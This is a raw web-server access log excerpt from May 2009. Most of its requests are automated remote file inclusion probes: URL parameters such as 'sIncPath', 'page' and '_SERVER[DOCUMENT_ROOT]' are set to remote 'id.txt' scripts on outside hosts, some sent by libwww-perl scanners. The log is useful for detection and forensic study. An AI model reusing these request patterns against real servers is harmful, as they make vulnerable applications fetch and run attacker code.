66.197.202.64 - - [07/May/2009:23:58:35 -0400] "GET /logs/access_log.Q108072400%20%20///?_SERVER[DOCUMENT_ROOT]=http://fst.upsi.edu.my/mambots/editors/id.txt?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
66.197.202.64 - - [07/May/2009:23:58:39 -0400] "GET /logs/access_log.Q108081200%20%20///?_SERVER[DOCUMENT_ROOT]=http://fst.upsi.edu.my/mambots/editors/id.txt?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
222.236.44.32 - - [07/May/2009:23:58:55 -0400] "GET /logs/error_log.Q108080800/errors.php?error=http://208.98.22.241/id.txt%0D?? HTTP/1.1" 404 234 "-" "libwww-perl/5.79"
121.254.231.239 - - [07/May/2009:23:59:15 -0400] "GET /logs/access_log.Q109042600/index1.php?=http://masterpule.100webspace.net/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
163.24.136.10 - - [07/May/2009:23:59:46 -0400] "GET /logs/access_log.Q108111600/admin.php?page=http://xlab.cn.nctu.edu.tw//modules/xoopsgallery/id2x.txt??%0D?? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
163.24.136.10 - - [07/May/2009:23:59:46 -0400] "GET /logs/access_log.Q108100900/admin.php?page=http://xlab.cn.nctu.edu.tw//modules/xoopsgallery/id2x.txt??%0D?? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
221.157.225.65 - - [07/May/2009:23:59:47 -0400] "GET //?sIncPath=http://datacore.fileave.com/id.txt?? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
221.157.225.65 - - [07/May/2009:23:59:47 -0400] "GET /logs//?sIncPath=http://datacore.fileave.com/id.txt?? HTTP/1.1" 200 351 "-" "Mozilla/5.0"
69.141.181.186 - - [07/May/2009:23:59:48 -0400] "GET /images/head_btn-products.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0035A04D81802200BC2C072+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; Media Center PC 5.0)"
